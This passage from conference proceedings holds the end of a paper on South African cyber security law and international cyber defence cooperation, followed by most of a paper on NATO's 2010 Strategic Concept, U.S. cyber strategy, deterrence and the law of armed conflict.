The State is also responsible for providing sufficient international protection from cyber attacks<br />
conducted by its residents from its territory. It is the duty of any State from whose territory an<br />
internationally wrongful act is conducted to cooperate with the victim’s State and to prevent future<br />
similar harmful deeds. If the State itself is not capable of protecting the interests of another sovereign,<br />
it may also not allow for private persons acting from within its territory to inflict damage or create<br />
danger to that the other State while they are protected by its immunity. Under such an interpretation,<br />
Russia’s denial to persecute the perpetrators of the attack against Estonia would constitute an<br />
internationally wrongful act, while Israeli involvement and punishment of the actors behind the Solar<br />
Sunrise attack on United States Airforce databases using the Texas internet provider exonerates<br />
them from any international responsibility (Kulesza 2010).<br />
In this light, it is therefore the obligation of the South African government to launch and support<br />
awareness projects to prevent these attacks from inside its borders. This also includes the<br />
establishment of a CSIRT, as proposed in the draft South African Cyber security policy. Currently,<br />
South Africa is one of only a handful of countries that does not have a running CSIRT, putting South<br />
Africa in a disadvantaged position with regard to cyber attack and defense (FIRST 2009).<br />
96
Marthie Grobler et al.<br />
6. Working towards international cyber defense collaboration<br />
Cyber warfare is an emerging form of warfare not explicitly addressed by existing international law.<br />
While most agree that legal restrictions should apply to cyber warfare, the international community<br />
has yet to reach consensus on how international humanitarian law (IHL) applies to this new form of<br />
conflict (Kelsey 2008). In particular, there is a need for an international consensus on the due<br />
diligence criteria which have to be fulfilled by a State in order to avoid international responsibility for<br />
failing to protecting other sovereigns from cyber attacks conducted from its territory.<br />
Another crucial issue would be to establish the standards for releasing a State from any international<br />
responsibility for not providing due diligence: would the adoption of specific provisions in national<br />
criminal laws be sufficient or would State authorities need to initiate a criminal investigation<br />
effectively? It should also be clarified whether a due diligence standard can be set post factum – after<br />
an attack had already taken place (Kulesza 2010). In South Africa, this is not possible.<br />
A suggested approach to create Nation State responsibility in building a credible cyber system<br />
involves the following steps:<br />
Developing a national strategy and making sure all agencies and major stakeholders follow it;<br />
Establishing a national endorsement body for cyber security;<br />
National coordination mechanism;<br />
Inclusion of all professional communities and private sector, and others in national cyber security<br />
effort; and<br />
Providing necessary resources and institutional changes (Tiirmaa-Klaar 2010).<br />
If all the States internationally can implement their own credible cyber system, cooperation on an<br />
international cyber defense level will be easier to realize. As an initial attempt to enable a more<br />
uniform cyber defense system, the <strong>European</strong> Commission is planning to impose harsher penalties for<br />
cyber crimes. Large-scale attacks in Estonia and Lithuania in recent years have highlighted the need<br />
for a stronger stance on cyber crime. Estonia, Lithuania, France and the United Kingdom also have<br />
longer sentences for such crime, and the <strong>European</strong> Commission is looking to harmonize practice<br />
across the member states. United States president Barack Obama has declared cyber crime to be a<br />
priority. In addition to stronger laws, the <strong>European</strong> Union is looking to set up a system through which<br />
member states can contact each other quickly to notify one another of attacks. That would help to<br />
build a picture of the scope of cyber crime (Geers ND).<br />
7. Conclusion<br />
The Internet has changed almost all aspects of human life, also including the nature of warfare. Every<br />
political and military conflict now has a cyber dimension, whose size and impact are difficult to predict.<br />
"The ubiquitous nature and amplifying power of the Internet mean that future victories in cyber space<br />
could translate into victories on the ground. National critical infrastructures, as they are increasingly<br />
connected to the Internet, will be natural targets during times of war. Therefore, nation-states will<br />
likely feel compelled to invest in cyber warfare as a means of defending their homeland and as a way<br />
to project national power" (Geers ND).<br />
The international scope of the internet and wide reach of technological usage has a tremendous<br />
impact on the nature of war and crimes globally. This article showed the impact of technological<br />
revolutions on warfare, the South African legislative system affecting warfare and cyber war, and the<br />
need for international cyber defense collaboration.<br />
References<br />
ECT Act (Electronic Communications and Transactions Act No 25 of 2002). (2002). Available from:<br />
http://www.acts.co.za/ect_act/ (Accessed 10 October 2010).<br />
FIRST. (2009). FIRST: Teams around the world. Available from: http://www.first.org/members/map/ (Accessed 14<br />
October 2010).<br />
Gardner, F. (2009). Nato's cyber defence warriors. BBC News. Available from: http://news.bbc.co.uk/<br />
2/hi/europe/7851292.stm (Accessed 22 September 2010).<br />
Geers, K. (ND). Cyber Defence. Available from: http://www.vm.ee/?q=en/taxonomy/term/214 (Accessed 22<br />
September 2010).<br />
97
Marthie Grobler et al.<br />
Giles, J. (2010). How will the PPI Bill affect you? Available from: http://www.michalsonsattorneys.com/ how-willthe-ppi-bill-affect-you/2586?gclid=COXtlKz6yKQCFcbD7QodHzHJDg<br />
(Accessed 10 October 2010).<br />
Government Gazette. (2003). Vol. 451 Cape Town 15 January 2003 No. 24250. No. 54 of 2002: Promotion of<br />
Access to Information Amendment Act, 2002.<br />
International Standards Organization. (2008). ISO/IEC 27005: 2005. Information security risk management.<br />
Available from: http://www.iso.org/iso/catalogue_detail?csnumber=50297 (Accessed 10 October 2010).<br />
Kelsey, JTG. (2008). Hacking into International Humanitarian Law: The Principles of Distinction and Neutrality in<br />
the Age of Cyber Warfare. P1427. Available from: http://heinonline.org/HOL/Landing<br />
Page?collection=journals&handle=hein.journals/mlr106&div=64&id=&page= (Accessed 22 September<br />
2010).<br />
Krepinevich, AF. (2003). Keeping pace with the military-technological revolution. Available from:<br />
http://www.issues.org/19.4/updated/krepinevich.pdf (Accessed 22 September 2010).<br />
Kulesza, J. (2010). State responsibility for acts of cyber-terrorism. 5 th GigaNet symposium Vilnius, Lithuania.<br />
Markoff, J. (2010). Step Taken to End Impasse Over Cybersecurity Talks. Available from: http://www.<br />
nytimes.com/2010/07/17/world/17cyber.html?_r=1 (Accessed 8 October 2010).<br />
NATO. (ND). Defending against cyber attacks. Available from: http://www.nato.int/cps/en/natolive/<br />
topics_49193.htm (Accessed 22 September 2010).<br />
O'Hanlon, ME. (2000). Technological change and the future of warfare. Brookings Institution Press: Washington.<br />
Owen, RS. (2008). Infrastructures of Cyber Warfare. Chapter V. In: Janczewski, L. & Colarik, AM. Cyber warfare<br />
and cyber terrorism. Information Science Reference: London.<br />
PAIA Act (Promotion of Access to Information Act No 2 of 2000 as amended). (2000). Available from:<br />
http://www.dfa.gov.za/department/accessinfo_act.pdf (Accessed 10 October 2010).<br />
Republic of South Africa. (2010). Protection of Personal Information Bill. Available from:<br />
http://www.justice.gov.za/legislation/bills/B9-2009_ProtectionOfPersonalInformation.pdf (Accessed 10<br />
October 2010).<br />
RIC Act (Regulation of Interception of Communications and Provision of Communication-related information Act.<br />
(2002). Available from: http://www.acts.co.za/ric_act/whnjs.htm. (Accessed 10 October 2010).<br />
SA Constitution. (1996). Available from: http://www.info.gov.za/documents/constitution/index.htm (Accessed 10<br />
October 2010).<br />
Tiirmaa-Klaar, H. (2010). International Cooperation in Cyber Security: Actors, Levels and Challenges. Cyber<br />
security 2010, Brussels, 22 September 2010 (<strong>Conference</strong>).<br />
UN Information Officer. (2010). Delegates Consider Best Response to Cybercrime as Congress Committee -<br />
Takes Up Dark Side of Advances in Information Technology. Available from:<br />
http://www.un.org/News/Press/docs/2010/soccp349.doc.htm (Accessed 10 October 2010).<br />
Warren, MJ. (2008). Terrorism and the internet. Chapter VI. In: Janczewski, L. & Colarik, AM. Cyber warfare and<br />
cyber terrorism. Information Science Reference: London.<br />
Williams, G. & Arreymbi, J. (2007). Is cyber tribalism winning online information warfare? ISSE/ SECURE 2007<br />
Securing Electronic Business Processes (2007): 65-72, January 01, 2007.<br />
Wilson, C. (2007). Information Operations, Electronic Warfare and Cyberwar: Capabilities and related policy<br />
issues. CRS report for congress. Available from: www.fas.org/sgp/crs/natsec/ RL31787.pdf (Accessed 17<br />
September 2010).<br />
98
Cyber Strategy and the Law of Armed Conflict<br />
Ulf Haeussler<br />
National Defense University, Washington, USA<br />
ulf.haeussler@ndu.edu<br />
Abstract: At the time of writing, the author was Assistant Legal Advisor Operational Law, Headquarters,<br />
Supreme Allied Commander Transformation (NATO HQ SACT). The views expressed herein are the author's<br />
own and to not necessarily reflect the official position or policy of NATO and/or HQ SACT. Abstract: At its Lisbon<br />
Summit (November 2010), NATO has adopted its Strategic Concept. The U.S. may soon adopt its Cyberstrategy<br />
3.0 (originally expected for December 2010). Both strategy documents will contribute to a growing policy<br />
consensus regarding cyber security and defence as well as provide better policy insights regarding cyber offence.<br />
In doing so, they will contribute to a better understanding of how NATO and the U.S. want to prepare for, and<br />
conduct cyber warfare in a manner congruent with the law of armed conflict. In addition, they will determine to<br />
what extent this branch of the law needs to be better understood, developed, or reformed. Accordingly, this paper<br />
indicates how the existing legal and policy frameworks intersect with practical aspects of cyber warfare and<br />
associated intelligence activities, analyses how the new strategy documents develop and change the existing<br />
policy framework, and what repercussions this may have for the interpretation and application of the law of armed<br />
conflict. It also demonstrates how the new strategy documents inform the policy and legal discourse and hence<br />
help confirm that NATO and U.S. as well as other NATO Nations' cyber activities are, and will continue to be,<br />
lawful and legitimate.<br />
Keywords: NATO Strategic Concept 2010, U.S. Cyberstrategy 3.0, Law of Armed Conflict, collective security,<br />
collective defence<br />
1. Introduction<br />
Cyberspace is increasingly referred to as one of the global commons and as the fifth domain in which<br />
warfare may occur (Lynn 2010, 101). Activities in cyberspace as well as involving the use of cyber<br />
capabilities to create, or contribute to the creation of, effects in any one of the other commons, or<br />
domains, have attracted significant discussion and analysis among technical experts, policymakers,<br />
and legal scholars. The ensuing efforts to develop frameworks for cyberspace and the use of<br />
associated capabilities (hereinafter collectively referred to as 'cyberspace') bring various perspectives<br />
to bear. Cyberspace is multifunctional; it equally attracts private activities (with a strong business<br />
component) and governments' official conduct as well as associated competing, if not conflicting,<br />
interests. Not surprisingly, cyberspace has its unarguable dark side – on both its non-governmental<br />
and its governmental end. The range of challenges and threats associated with the dark side of<br />
cyberspace comprises, but is not limited to, privacy intrusions, financial loss, damage and destruction<br />
in the physical domains, the potential of injury or even death, and (other) adverse effects on the<br />
effectiveness of government. These challenges and threats reflects the large extent to which<br />
computers and other information and communication technology devices can be leveraged as<br />
weapons by non-governmental actors. Further challenges may arise out of policy positions adopted<br />
by some non-governmental actors. For instance, the so-called 'internet pirates' endorse the notion of<br />
a cyberspace beyond any government control whatsoever – a desire which, were it to come true,<br />
might exacerbate all other challenges and threats referred to above.<br />
Attempts to characterise cyber challenges and threats have usually used references to challenges<br />
and threats in the physical domains, to which the word 'cyber' is added as a qualifier, enabling the<br />
creation of catchwords such as cyber crime, cyber terrorism, and cyber attack. The terminology<br />
developed using this method is attractive because it triggers analogies with known phenomena.<br />
However, it is also prone to carrying misleading connotations since such analogies may easily fuel<br />
misconceptions. For instance, the terms 'cyber crime' and 'cyber terrorism' do not capture the whole<br />
range of non-governmental actors' malicious activities; moreover, they do not even attempt to address<br />
possible links between non-governmental actors and their potential governmental sponsors. By<br />
contrast, the term 'cyber attack' is too broad. Thus, information gathering activities may be referred to<br />
as cyber attacks, though they might not necessarily or directly cause tangible damage. The<br />
undifferentiated use of the notion of 'attack' may foster arguments by which a nation's inherent right of<br />
self-defence is considered relevant to cyber activities or actions which neither has nor causes<br />
potential or actual adverse effects. These examples may be indicative of a gap between technological<br />
realities and the terminology used in policymaking as well as legal interpretation.<br />
99
Ulf Haeussler<br />
Following the cyber incident Estonia sustained in 2007 and the probable integration of a cyber line of<br />
operation in the Russian campaign against Georgia in 2008, the discussion and analysis regarding<br />
cyber challenges and threats has gathered new momentum. The recent Stuxnet incident might have<br />
taken this discussion and analysis to a turning point, for many observed that the Rubicon has been<br />
crossed regarding the development of real 'cyber weapons'. NATO's 2010 Strategic Concept and the<br />
expected U.S. Cyberstrategy 3.0 (will) represent a sophisticated approach towards cyber challenges<br />
and threats. As far as collective security and defence are concerned, they (will) confirm that the dark<br />
side of cyber involves more than just economic crime, and that most of its emanations can be<br />
effectively addressed: through the existing mechanisms designed to maintain and restore<br />
international peace and security as well as the principles and rules governing the conduct of<br />
hostilities, on the one hand and the protection of civilians and other individuals in the course of armed<br />
conflict on the other hand. At the same time, they (will) indicate why and how these existing<br />
frameworks support preventive measures and hence enhance the full spectrum of collective cyber<br />
security and defence. As a result, they (will) inform the interpretation and application of both branches<br />
of the law of armed conflict, that is, the legal framework informing decision-making processes on<br />
whether as well as how to use force in international relations or against non-governmental actors.<br />
2. Developing cyber policy consensus regarding collective defence<br />
Like any other legal source, international law, including the law of armed conflict, is rooted in policy<br />
consensus. For the challenges and threats associated with the dark side of the cyberspace to be<br />
captured by the law of armed conflict they must be an integral part of the policy consensus regarding<br />
the relevant international agreements and customary rules. Two basic concepts used by the law of<br />
armed conflict stand out in this respect: the notion of 'armed attack' (cf. Article 51 of the UN Charter,<br />
Article 5 of the North Atlantic Treaty, and Article 7 of the Rio Treaty), triggering the right of individual<br />
and collective self-defence; and the notion of 'attack' (cf. Article 49 of the First Additional Protocol to<br />
the Geneva Conventions), guiding many aspects of the conduct of hostilities within an armed conflict.<br />
These terms of art also reflect the fundamental differentiation within the law of armed conflict between<br />
the principles and rules that govern the legality of the use of force in international relations (jus ad<br />
bellum) and the conduct of hostilities (jus in bello).<br />
Political and military strategies have an important role to play in the process of consensus-building<br />
regarding international law. They reflect how States individually and collectively assess their scope of<br />
action – assuming for this purpose that no State has a genuine desire to consider acting, or to actually<br />
act, deliberately illegal. If this assumption is accepted, then NATO's Strategic Concept 2010 indicates<br />
more than that cyber incidents may trigger its collective security and defence mechanisms. It also<br />
confirms, as a matter of policy consensus, that cyber incidents are capable of amounting to an armed<br />
attack within the coordinates of the law of armed conflict. Likewise, the U.S. Department of Defense's<br />
readiness to coordinate its cyber defence effort across the government, with allies, and with partners<br />
in the commercial sector (cf. Lynn 2010, 103) does not only leverage collective security and defence<br />
as one aspect of the U.S. response to cyber threats. It also indicates that nothing in the law of armed<br />
conflict is considered an obstacle to utilising these mechanisms.<br />
Since an effort at developing consensus among 28 sovereign States will yield a different result than<br />
policy determinations within one sovereign State's government, the development of NATO cyber<br />
defence policy until 2010 will be analysed to identify the Euro-Atlantic common denominator,<br />
denominator which – one would expect – the drafters of U.S. Cyberstrategy 3.0 are fully aware of.<br />
NATO's consensus-building process regarding cyber defence policy started with its Strategic Concept<br />
1999. In this document, NATO observed that 'state and non-state adversaries may try to exploit the<br />
Alliance's growing reliance on information systems through information operations designed to disrupt<br />
such systems' (NATO 1999, paragraph 23). However, only after Estonia had sustained the wellknown<br />
cyber incident did NATO actually adopt a cyber defence policy and started developing<br />
structures and authorities to carry it out (NATO 2008, paragraph 47). Roughly two years after the<br />
cyber incident sustained by Estonia and nearly a year after Russia had possibly integrated a cyber<br />
line of operation in its campaign against Georgia (cf. Gates 2009, 5; Ilves 2010; but see also<br />
Independent International Fact-Finding Mission 2010, Vol II, 217sqq), NATO still conceded that<br />
despite the establishment of its Cyber Defence Management Authority and improvements of the<br />
existing NATO Computer Incident Response Capability (NCIRC), its cyber defence capabilities yet<br />
had to achieve full readiness (NATO 2009, paragraph 49). That notwithstanding, since 2008 NATO<br />
policy couples the notions of protecting key information and communication systems on which the<br />
100
Ulf Haeussler<br />
Alliance and Allies rely with countering – later rephrased as responding to – cyber attacks using its<br />
own cyber defence capabilities as well as leveraging linkages between NATO and national authorities<br />
(NATO 2008, paragraph 47 and NATO 2009, paragraph 49), and – envisaged since 2009 –<br />
appropriate partnerships and cooperation (NATO 2009, ibid.).<br />
NATO policy developed since 1999 is correctly based on the observation that NATO and its Nations<br />
rely significantly on information and communication systems, reliance susceptible to exploitation. It is<br />
worthwhile mentioning that the observation referred to is not a reference to the notion of 'cyber<br />
exploitation' which by definition captures non-destructive information gathering activities which may be<br />
performed by strategic competitors and potential adversaries (Owens et al. 2009, 1). Conversely, in<br />
using the term 'disrupt', NATO’s Strategic Concept 1999 had introduced language which covers both<br />
potential destructive effects of cyber attacks and other adverse effects of the same scale and gravity.<br />
(Note that the term 'to disrupt' is defined as 'to cause disorder in something' (Oxford 1989, 348);<br />
'causing disorder' in ICT is tantamount to causing its losing part or all of its operability.) The language<br />
used at a later stage does not indicate a change of this appraisal of the possible consequences of<br />
cyber attacks. In particular, the notion of countering cyber attacks, used in the Bucharest Summit<br />
Declaration 2008, is sufficiently close to the general doctrinal notion of counterattack to suggest that<br />
its drafters had the idea of counter-offensive in mind. The fact that NATO later substituted the notion<br />
of 'responding' to cyber attacks for the initially used term 'countering' them does not contradict this<br />
assessment since countering cyber attacks is but one possible option for responding to them.<br />
Actually, 'responding' is broader in scope; in addition to counter-offensive measures it also captures a<br />
wide range of other measures including those of a political and diplomatic nature.<br />
Taking the different points of view regarding the legal nature of cyber attacks into account, NATO's<br />
policy documents help consolidating the developing consensus regarding the interpretation of the law<br />
of armed conflict in cyber matters. Fully aware of the unsettled legal nature of cyber attacks, NATO<br />
has agreed to multiple documents which in unison do not rule out that cyber attacks – initially referred<br />
to as information operations – may be considered as destructive, or potentially destructive, in nature.<br />
Now that the capacity to be destructive, or potentially destructive, in nature is a quintessential<br />
characteristic of both armed attacks as defined for the purposes of the jus ad bellum and attacks as<br />
defined for the purposes of the jus in bello, NATO's policy declarations necessarily imply the<br />
Alliance’s tacit endorsement of the view that cyber attacks – at least theoretically – can have the<br />
nature of armed attacks and/or attacks, as the case may be. It is important to note that, depending on<br />
the circumstances, an act opening hostilities may coincidentally be an armed attack from a jus ad<br />
bellum perspective and an attack from a jus in bello perspective. However, this coincidence would be<br />
one of fact rather than an amalgamation of these notions which belong to different branches of<br />
international law and hence warrant separate assessment.<br />
International treaty law often captures new factual developments through subsequent agreement<br />
regarding the interpretation of a treaty or the application of its provisions (cf. Article 31(3)(a) of the<br />
Vienna Convention on the Law of Treaties). Whilst NATO policy does not represent agreement which<br />
would bring all cyber attacks within the ambit of the North Atlantic Treaty and other relevant<br />
international agreements, it does a fortiori not exclude individual cyber attacks from being considered<br />
as an armed attack and/or an attack.<br />
NATO's Strategic Concept 2010 confirms and reinforces earlier policy. Its assessment of the security<br />
environment states that cyber attacks 'can reach a threshold that threatens national and Euro-Atlantic<br />
prosperity, security and stability', and that foreign militaries can be 'the source of such attacks' (NATO<br />
2010a, at paragraph 12). In addressing Article 5 of the North Atlantic Treaty, NATO stresses its<br />
responsibility 'to protect and defend our territory and our population against attack' (id., paragraph 16).<br />
Whilst critical infrastructure is captured by the notion of territorial defence, the reference to the<br />
population should be read as to comprise key elements of statehood such as governability – essential<br />
to human security – and the integrity of democratic decision-making – an essential tenet of<br />
participatory democracy (Häußler 2010). NATO has also expressly embraced the need to further<br />
develop its 'ability to prevent, detect, defend against and recover from cyber-attacks' (NATO 2010a,<br />
paragraph 19) and its aim to 'carry out the necessary … information exchange for assuring our<br />
defence against ... emerging security challenges'. The notion of 'emerging security challenges',<br />
though not expressly defined, is illustrated by the portfolio of the recently established NATO<br />
Headquarters directorate carrying the same name, which comprises challenges arising in and out of<br />
101
Ulf Haeussler<br />
the cyberspace. The Lisbon Summit Declaration further elaborates and reinforces the full integration<br />
of cyber defence in NATO's collective security and defence framework (NATO 2010b, paragraph 47).<br />
3. Leveraging collective defence for collective security through deterrence<br />
Credible deterrence is a complex achievement which traditional strategy used to build on multiple<br />
pillars, involving containment (including through the prospect of retaliation) and arms control (that is,<br />
confidence building and disarmament). NATO and the U.S. use different definitions of deterrence in<br />
military doctrine. These definitions have in common that both are concerned with potential<br />
adversaries' perceptions of the relationship between action and counteraction. However, they<br />
describe the method to influence potential adversaries' mindsets in fairly different manners. NATO<br />
defines the notion of deterrence as '[t]he convincing of a potential aggressor that the consequences of<br />
coercion or armed conflict would outweigh the potential gains'; the definition continues to observe that<br />
'[t]his requires the maintenance of a credible military capability and strategy with the clear political will<br />
to act' (NATO Glossary, 2-D-6). By contrast, the U.S. definition of deterrence is more outspoken about<br />
the method by which to influence potential adversaries' mindsets. It clearly favours containment,<br />
explaining that '[d]eterrence is a state of mind brought about by the existence of a credible threat of<br />
unacceptable counteraction'. On this basis, it is able to describe the nature of the mindset desired on<br />
the part of potential adversaries in capturing the notion of deterrence through a reference to '[t]he<br />
prevention from action by fear of the consequences' (DoD Dictionary, 139).<br />
International security is a product of multiple factors of which deterrence is but one. Resilience<br />
towards potential threats and rules incentivising desired conduct are equally important; they are tools<br />
to prevent differences from growing into disputes, or the pacific settlement of the latter, as the case<br />
may be. However, experience confirms that incentivising tools will not always suffice to avert all<br />
potential threats. Accordingly, cyber deterrence – based on the availability of defence and counteroffence<br />
capabilities as well as the political will to use them, if required – will make a viable contribution<br />
to international security. NATO is ready for cyber deterrence. It is continuously improving relevant<br />
capabilities, and the Strategic Concept 2010 has tied the knot on the evolving integration of cyber<br />
defence in the notion of collective defence.<br />
NATO is not only increasingly well prepared to develop effective deterrence against cyber attacks the<br />
organisation itself or its members may have to face in the future. The Alliance is also able, as a matter<br />
of policy, to deter undesirable usages of cyberspace affecting its operations through a cyber line of<br />
operation, regardless of whether they serve the purpose of collective defence (Article 5 of the North<br />
Atlantic Treaty) or have the character of Non-Article 5 Crisis Response Operations (Häußler 2011,<br />
168).<br />
In light of the foregoing, NATO's policy choice not to exclude cyber attacks from its collective defence<br />
mechanism (Article 5 of the North Atlantic Treaty) has a significant aspect with regard to deterrence.<br />
As long as its collective defence mechanism is a viable option, the Alliance can – a maiore ad minus –<br />
even more convincingly tackle challenges associated with cyberspace through its collective security<br />
mechanism. Whilst the latter primarily relies on consultations as envisaged in Article 4 of the North<br />
Atlantic Treaty, its invocation may result in effective measures short of the use of force. As indicated<br />
by the single reported case of an express invocation of Article 4 by a NATO Nation, consultations<br />
pursuant to this article may lead to the deployment of appropriate capabilities – up to and including<br />
those represented by armed forces – to respond to the aforementioned security threats. In February<br />
2003, Turkey asked for consultations concerning its defence needs arising out of the impending<br />
resumption of hostilities against Iraq (Gallis 2003, 1). The consultations were conducted by NATO's<br />
Defence Planning Committee which requested military advice from NATO's Military Authorities, and,<br />
having obtained the latter, authorised the implementation of defensive measures (NATO DPC 2003).<br />
In a similar manner, in the event of a cyber incident, NCIRC Rapid Reaction Teams (RRTs) may<br />
support national Computer Emergency Response Teams (CERTs) (cf. NCSA 2009). By reinforcing<br />
existing defences, the deployment of RRTs may make an effective contribution to deterring unfriendly<br />
activities whose prospect of success they reduce or deny. Accordingly, consultations may result in<br />
preventive deterrence: provided they are not a means of last resort in a misguided approach focusing<br />
on "talking only" whilst "no action" is allowed to occur.<br />
As indicated above, NATO's cyber security and defence policy is geared towards supporting national<br />
efforts. This approach extends the consolidated practice of cooperation within NATO to the<br />
cyberspace. As illustrated by the response to the 9/11 attack on the U.S. as well as the steps<br />
102
Ulf Haeussler<br />
following the invocation of Article 4 by Turkey, NATO's collective security and defence mechanisms<br />
rely on the assessment of the Nation affected. Though NATO first and foremost provides an umbrella<br />
enabling Allies' mutual support, it may also decide to launch operations led by the Alliance, such as<br />
Operation Active Endeavour following the 9/11 attack. NATO's strategic policy choices regarding<br />
cyber security and defence may in a similar manner serve as an interface for connecting national<br />
security and defence efforts. After its adoption, Cyberstrategy 3.0 may demonstrate what the U.S.<br />
expects as well as what it is prepared to contribute to achieve such 'greater levels of cooperation [as]<br />
needed to stay ahead of the cyberthreat' (Lynn 2010, 105).<br />
4. Cyberstrategy 3.0 – cyber defence as an integral part of national defence<br />
NATO's positive acknowledgement, through its strategic policy consensus, of a nation's sovereign<br />
right to consider cyber defence as an integral part of national security and defence, has clear legal<br />
implications. It is this acknowledgement by which NATO has confirmed that national cyber security<br />
and defence is eligible for support through its collective security and defence mechanisms. That said,<br />
there are two different ways of looking at national cyberstrategy. On the one hand, a national<br />
cyberstrategy is likely to represent the codification of national cyber security and defence concerns<br />
ranging from a description of the situation, own and adversarial, through a survey of the broader<br />
operating environment to the resulting assessment and conclusions. On the other hand, a national<br />
cyberstrategy may also indicate in what situations NATO could theoretically expect to receive<br />
requests for consultation under Article 4, or for collective self-defence under Article 5 of the North<br />
Atlantic Treaty, as well as what capabilities might be available to support collective efforts made under<br />
the auspices of the Alliance.<br />
The description of the situation in cyberspace in which constitutional democracies in general and<br />
NATO Nations in particular are likely to find themselves is comprised in the observation that: 'In less<br />
than a generation, information technology in the military has evolved from an administrative tool for<br />
enhancing office productivity into a national strategic asset in its own right' (id., 98).<br />
Adversaries can easily exploit this situation by leveraging off the shelf technology which is not only<br />
available at comparably low cost but also can be put to use by a limited number of personnel – '[a]<br />
dozen determined computer programmers' (ibid.) – 'if they find a vulnerability to exploit' (ibid.). The<br />
unpleasant reality is that 'today anyone with a computer can engage in some level of cyber<br />
destruction' (Vamosi 2011, quoting the National Defense University's F.D. Kramer). In addition, the<br />
estimates that programming the Stuxnet code may have taken about half a year also indicates that<br />
warning periods regarding a force build-up in the cyberspace are much smaller than regarding a<br />
conventional force build-up. However, there may not be any warning period at all if, like in the case of<br />
Stuxnet, an adversary manages to launch a zero-day attack or leverage a zero-day exploit (Wikipedia,<br />
Zero Day Attack).<br />
That said, it is not surprising that '[i]n cyberspace, the offense has the upper hand', factor requiring a<br />
flexible strategy since '[i]n an offense-dominant environment, a fortress mentality will not work' (Lynn<br />
2010, 99). Accordingly, evolving U.S. cyber strategy is likely to put less emphasis on containment<br />
than traditional strategy as embodied in military doctrine. According to the U.S. Deputy Secretary of<br />
Defense, 'traditional Cold War deterrence models of assured retaliation do not apply to cyberspace,<br />
where it is difficult and time consuming to identify an attack's perpetrator' (ibid.). This observation<br />
does not simply shift the emphasis from containment to arms control. On the contrary, '[t]raditional<br />
arms control regimes would likely fail to deter cyberattacks because of the challenges of attribution,<br />
which make verification of compliance almost impossible.' (id., 100).<br />
In essence, this means that both traditional elements of deterrence seem to be considered<br />
unsatisfactory for the purposes of cyber deterrence. It is hence fairly unlikely that efforts made by<br />
some States to leverage support for cyber arms control within the United Nations will yield tangible<br />
results any time soon. Whilst cyber deterrence does not abandon the approach based on influencing<br />
potential adversaries' mindsets (Vamosi 2011) it will most likely have to rely on different methods to<br />
achieve this desired effect. In particular, cyber 'deterrence will necessarily be based more on denying<br />
any benefit to attackers than on imposing costs through retaliation' (Lynn 2010, 99sq). This approach<br />
couples elements of 'defensive resilience [within] cyber networks' (Vamosi 2011, quoting F.D. Kramer)<br />
and active defence. To that end, it may require different models of 'international norms of behavior in<br />
cyberspace … such as that of public health or law enforcement' (Lynn 2010, 100). Normative models<br />
derived from international environmental law might also be instrumental. In the U.S., active defence of<br />
103
Ulf Haeussler<br />
defence sector computer networks complements 'ordinary computer hygiene, which keeps security<br />
software and firewalls up to date, and sensors, which detect and map intrusions' (id., 103). Defence<br />
sector networks rely on systems that, using (signals) intelligence warnings, 'automatically deploy<br />
defenses to counter intrusions in real time' (ibid.). 'They work by placing scanning technology at the<br />
interface of military networks and the open Internet to detect and stop malicious code before it passes<br />
into military networks' (ibid.). Moreover, the notion of active defence also covers the effort to detect<br />
intruders who have managed to escape detection at the interface (ibid.).<br />
In sum, the evolving U.S. approach of defensive resilience coupled with active defence and NATO's<br />
emerging notion of preventive deterrence seem to correspond harmoniously. As cyberstrategy<br />
development continues, the impact of NATO's and national approaches on the conduct of military<br />
operations in general and the conduct of hostilities in particular will require associated legal analysis.<br />
Rather than focusing on cyber operations in isolation, this analysis will have to consider that cyber<br />
warfare may become part of a spectrum of military responses available to the relevant policymakers<br />
(cf. Vamosi 2011).<br />
5. Conclusion<br />
From an international law perspective, the choices regarding cyber security and defence made by<br />
NATO's Strategic Concept 2010 correspond to questions related to the legality of use of force (jus ad<br />
bellum) and implicitly defer questions pertaining to the legal framework governing the conduct of<br />
hostilities (jus in bello) to future analysis. National cyberstrategy development points in the same<br />
direction. From an overall perspective, cyberstrategy development has the demonstrated potential to<br />
accelerate consensus building processes regarding the question of whether cyber attacks can be<br />
matters of national security and defence, including through effective deterrence, and in that capacity<br />
also trigger collective security and defence mechanisms like those based on the North Atlantic Treaty.<br />
At the same time, existing and evolving cyberstrategies do not yet provide all necessary insights<br />
regarding important questions such as how to leverage normative models of public health and<br />
environmental protection as well as the adaptation to cyberspaces' realities of the notions of<br />
combatancy and direct participation in hostilities, targetability of civilian objects turned military<br />
objectives, questions answer which still involves challenges in light of technical realities which may<br />
defy the development of prognoses required to develop an expectation regarding collateral damage<br />
and an anticipation of military advantage with a sufficient degree of predictability.<br />
References<br />
Gallis, P. (2003) NATO’s Decision-Making Procedure (CRS Report for Congress, Order Code', RS21510, 05 May<br />
2003), http://www.fas.org/man/crs/RS21510.pdf<br />
Gates, R.M., U.S. Secretary of Defense (2009) "The National Defense Strategy", Joint Forces Quarterly, issue<br />
52, 1 st quarter 2009, 1-7<br />
Häußler, U. (2010) "Cyber Security and Defence from the Perspective of Articles 4 and 5 of the North Atlantic<br />
Treaty", Tikk, E. and Talihärm, A.-M., International Cyber Security Legal & Policy Proceedings, 100-126<br />
Häußler, U. (2011) "Crisis Response Operations in Maritime Environments", Odello, M. and Piotrowicz, R.,<br />
International Military Missions and International Law (forthcoming: Brill, Amsterdam), 161-210<br />
Ilves, His Excellency Mr. T.H., President of the Republic of Estonia (2010) Opening Address at the June 2010<br />
Cyber Conflict <strong>Conference</strong>, http://www.ccdcoe.org/conference2010/329.html; cf.<br />
http://www.nato.int/cps/en/SID-B2AD4DE6-E0B91B4E/natolive/news_64615.htm?<br />
Independent International Fact-Finding Mission on the Conflict in Georgia established by the <strong>European</strong> Union<br />
(2010), Report, Vol II<br />
Lynn, W.J. III "Defending a New Domain – The Pentagon’s Cyberstrategy", Foreign Affairs Volume 89 Number 5,<br />
97-108<br />
NATO (1999) The Alliance's Strategic Concept dated 24 April 1999,<br />
http://www.nato.int/cps/en/natolive/official_texts_27433.htm<br />
NATO (2008) Bucharest Summit Declaration dated 03 April 2008,<br />
http://www.nato.int/cps/en/natolive/official_texts_8443.htm<br />
NATO (2009) Strasbourg / Kehl Summit Declaration dated 04 April 2009,<br />
http://www.nato.int/cps/en/natolive/news_52837.htm?mode=pressrelease<br />
NATO (2010a) Active Engagement, Modern Defence – Strategic Concept 2010 dated 19 November 2010,<br />
http://www.nato.int/lisbon2010/strategic-concept-2010-eng.pdf<br />
NATO (2010b) Lisbon Summit Declaration dated 20 November 2010,<br />
http://www.nato.int/cps/en/natolive/official_texts_68828.htm<br />
